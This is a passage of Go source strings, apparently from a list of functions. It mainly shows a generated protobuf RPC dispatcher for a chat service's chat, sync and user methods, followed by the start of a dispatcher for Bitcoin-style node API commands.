\"RPC_Chat.DeleteMessagesByIds\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_DeleteMessagesByIds\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteMessagesByIds\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteMessagesByIds\",\"RPC_Chat.DeleteMessagesByIds\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetMessagesAsReceived\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_SetMessagesAsReceived{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetMessagesAsReceived(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.SetMessagesAsReceived\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_SetMessagesAsReceived\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetMessagesAsReceived\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetMessagesAsReceived\",\"RPC_Chat.SetMessagesAsReceived\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"EditMessage\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_EditMessage{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.EditMessage(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.EditMessage\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_EditMessage\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_EditMessage\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_EditMessage\",\"RPC_Chat.EditMessage\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetChatList\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_GetChatList{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetChatList(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.GetChatList\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_GetChatList\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatList\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatList\",\"RPC_Chat.GetChatList\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetChatHistoryToOlder\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_GetChatHistoryToOlder{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetChatHistoryToOlder(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.GetChatHistoryToOlder\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_GetChatHistoryToOlder\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatHistoryToOlder\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatHistoryToOlder\",\"RPC_Chat.GetChatHistoryToOlder\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetFreshAllDirectMessagesList\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_GetFreshAllDirectMessagesList{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetFreshAllDirectMessagesList(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.GetFreshAllDirectMessagesList\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_GetFreshAllDirectMessagesList\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetFreshAllDirectMessagesList\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetFreshAllDirectMessagesList\",\"RPC_Chat.GetFreshAllDirectMessagesList\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_Other\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Other\n\t\trpc := rpcHandler.RPC_Other\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Other\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"Echo\": //each pb_service_method\n\t\t\tload := &PB_OtherParam_Echo{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.Echo(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Other.Echo\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_OtherResponse_Echo\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_OtherResponse_Echo\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_OtherResponse_Echo\",\"RPC_Other.Echo\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_Sync\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Sync\n\t\trpc := rpcHandler.RPC_Sync\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Sync\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"GetGeneralUpdates\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_GetGeneralUpdates{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetGeneralUpdates(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.GetGeneralUpdates\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_GetGeneralUpdates\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetGeneralUpdates\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetGeneralUpdates\",\"RPC_Sync.GetGeneralUpdates\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetNotifyUpdates\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_GetNotifyUpdates{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetNotifyUpdates(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.GetNotifyUpdates\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_GetNotifyUpdates\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetNotifyUpdates\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_GetNotifyUpdates\",\"RPC_Sync.GetNotifyUpdates\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetLastSyncDirectUpdateId\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_SetLastSyncDirectUpdateId{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetLastSyncDirectUpdateId(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.SetLastSyncDirectUpdateId\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_SetLastSyncDirectUpdateId\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncDirectUpdateId\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncDirectUpdateId\",\"RPC_Sync.SetLastSyncDirectUpdateId\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetLastSyncGeneralUpdateId\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_SetLastSyncGeneralUpdateId{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetLastSyncGeneralUpdateId(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.SetLastSyncGeneralUpdateId\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_SetLastSyncGeneralUpdateId\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncGeneralUpdateId\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncGeneralUpdateId\",\"RPC_Sync.SetLastSyncGeneralUpdateId\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetLastSyncNotifyUpdateId\": //each pb_service_method\n\t\t\tload := &PB_SyncParam_SetLastSyncNotifyUpdateId{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetLastSyncNotifyUpdateId(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Sync.SetLastSyncNotifyUpdateId\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_SyncResponse_SetLastSyncNotifyUpdateId\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncNotifyUpdateId\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_SyncResponse_SetLastSyncNotifyUpdateId\",\"RPC_Sync.SetLastSyncNotifyUpdateId\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_UserOffline\":\n\n\t\t//rpc,ok := rpcHandler.RPC_UserOffline\n\t\trpc := rpcHandler.RPC_UserOffline\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_UserOffline\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"BlockUser\": //each pb_service_method\n\t\t\tload := &PB_UserParam_BlockUser{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.BlockUser(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.BlockUser\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_BlockUser\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_BlockUser\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_BlockUser\",\"RPC_UserOffline.BlockUser\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"UnBlockUser\": //each pb_service_method\n\t\t\tload := &PB_UserParam_UnBlockUser{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.UnBlockUser(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.UnBlockUser\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_UnBlockUser\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UnBlockUser\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UnBlockUser\",\"RPC_UserOffline.UnBlockUser\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"UpdateAbout\": //each pb_service_method\n\t\t\tload := &PB_UserParam_UpdateAbout{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.UpdateAbout(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.UpdateAbout\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_UpdateAbout\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateAbout\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateAbout\",\"RPC_UserOffline.UpdateAbout\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"UpdateUserName\": //each pb_service_method\n\t\t\tload := &PB_UserParam_UpdateUserName{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.UpdateUserName(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.UpdateUserName\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_UpdateUserName\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateUserName\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_UpdateUserName\",\"RPC_UserOffline.UpdateUserName\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"ChangePrivacy\": //each pb_service_method\n\t\t\tload := &PB_UserParam_ChangePrivacy{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.ChangePrivacy(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.ChangePrivacy\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponseOffline_ChangePrivacy\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponseOffline_ChangePrivacy\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponseOffline_ChangePrivacy\",\"RPC_UserOffline.ChangePrivacy\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"ChangeAvatar\": //each pb_service_method\n\t\t\tload := &PB_UserParam_ChangeAvatar{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.ChangeAvatar(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_UserOffline.ChangeAvatar\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserOfflineResponse_ChangeAvatar\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_ChangeAvatar\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserOfflineResponse_ChangeAvatar\",\"RPC_UserOffline.ChangeAvatar\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_User\":\n\n\t\t//rpc,ok := rpcHandler.RPC_User\n\t\trpc := rpcHandler.RPC_User\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_User\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"CheckUserName\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.CheckUserName(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_User.CheckUserName\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName\",\"RPC_User.CheckUserName\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetBlockedList\": //each pb_service_method\n\t\t\tload := &PB_UserParam_BlockedList{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetBlockedList(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_User.GetBlockedList\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_BlockedList\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_BlockedList\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_BlockedList\",\"RPC_User.GetBlockedList\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tdefault:\n\t\tnoDevErr(errors.New(\"rpc dosent exisit for: \" + cmd.Command))\n\t}\n}", "func (p *Engine) Worker() {\n\n}", "func RunAPI(server *Server, quit qu.C) {\n\tnrh := RPCHandlers\n\tgo func() {\n\t\tD.Ln(\"starting up node cAPI\")\n\t\tvar e error\n\t\tvar res interface{}\n\t\tfor {\n\t\t\tselect { \n\t\t\tcase msg := <-nrh[\"addnode\"].Call:\n\t\t\t\tif res, e = nrh[\"addnode\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.AddNodeCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan AddNodeRes) <-AddNodeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"createrawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"createrawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.CreateRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan CreateRawTransactionRes) <-CreateRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"decoderawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"decoderawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.DecodeRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.TxRawDecodeResult); ok { \n\t\t\t\t\tmsg.Ch.(chan DecodeRawTransactionRes) <-DecodeRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"decodescript\"].Call:\n\t\t\t\tif res, e = nrh[\"decodescript\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.DecodeScriptCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.DecodeScriptResult); ok { \n\t\t\t\t\tmsg.Ch.(chan DecodeScriptRes) <-DecodeScriptRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"estimatefee\"].Call:\n\t\t\t\tif res, e = nrh[\"estimatefee\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.EstimateFeeCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(float64); ok { 